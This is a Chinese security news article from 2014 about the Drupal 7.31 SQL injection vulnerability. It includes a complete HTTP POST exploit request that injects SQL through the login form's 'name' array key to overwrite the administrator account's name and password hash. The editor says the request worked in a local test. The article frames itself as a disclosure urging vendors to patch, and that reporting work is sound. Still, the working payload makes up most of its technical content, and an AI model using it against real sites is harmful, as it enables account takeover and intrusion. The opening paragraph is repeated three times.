Drupal 7.31版本爆嚴(yán)重SQL注入漏洞
責(zé)編:admin |2014-10-17 13:49:18今早有國外安全研究人員在Twitter上曝出了Drupal 7.31版本的最新SQL注入漏洞,并給出了利用測試的EXP代碼,小編在本地搭建Drupal7.31的環(huán)境,經(jīng)過測試,發(fā)現(xiàn)該利用代碼可成功執(zhí)行并在數(shù)據(jù)庫中增加一個(gè)攻擊者自定義的用戶。
測試代碼:(請勿用于非法用途)
POST /drupal-7.31/?q=node&destination=node HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: http://127.0.0.1/drupal-7.31/Cookie: Drupal.toolbar.collapsed=0; Drupal.tableDrag.showWeight=0; has_js=1Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 231name[0%20;update+users+set+name%3d'owned'+,+pass+%3d+'$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld'+where+uid+%3d+'1';;#%20%20]=test3&name[0]=test&pass=shit2&test2=test&form_build_id=&form_id=user_login_block&op=Log+in本地環(huán)境測試效果:
今早有國外安全研究人員在Twitter上曝出了Drupal 7.31版本的最新SQL注入漏洞,并給出了利用測試的EXP代碼,小編在本地搭建Drupal7.31的環(huán)境,經(jīng)過測試,發(fā)現(xiàn)該利用代碼可成功執(zhí)行并在數(shù)據(jù)庫中增加一個(gè)攻擊者自定義的用戶。
今早有國外安全研究人員在Twitter上曝出了Drupal 7.31版本的最新SQL注入漏洞,并給出了利用測試的EXP代碼,小編在本地搭建Drupal7.31的環(huán)境,經(jīng)過測試,發(fā)現(xiàn)該利用代碼可成功執(zhí)行并在數(shù)據(jù)庫中增加一個(gè)攻擊者自定義的用戶。
請相關(guān)廠商關(guān)注,并盡快修復(fù)漏洞。
- 周鴻祎領(lǐng)銜!百所高校+企業(yè)組團(tuán)亮相ISC.AI 2025“紅衣課堂”
- 港科大發(fā)布大模型越獄攻擊評估基準(zhǔn),覆蓋6大類別37種方法
- 引領(lǐng)智能運(yùn)維!全新FortiAIOps 3.0重新定義IT運(yùn)營
- MirageFlow:一種針對Tor的新型帶寬膨脹攻擊
- 英偉達(dá)約談事件的制度邏輯與趨勢展望
- 國家互聯(lián)網(wǎng)信息辦公室發(fā)布《國家信息化發(fā)展報(bào)告(2024年)》
- 火狐中國終止運(yùn)營:辦公地?zé)o人,用戶賬號數(shù)據(jù)面臨清空
- 25年一直未變!網(wǎng)絡(luò)安全永恒的“十大法則”
- 關(guān)于征集數(shù)據(jù)安全評估標(biāo)準(zhǔn)化應(yīng)用實(shí)踐案例的通知
- ISC.AI 2025主題前瞻:ALL IN AGENT,全面擁抱智能體時(shí)代!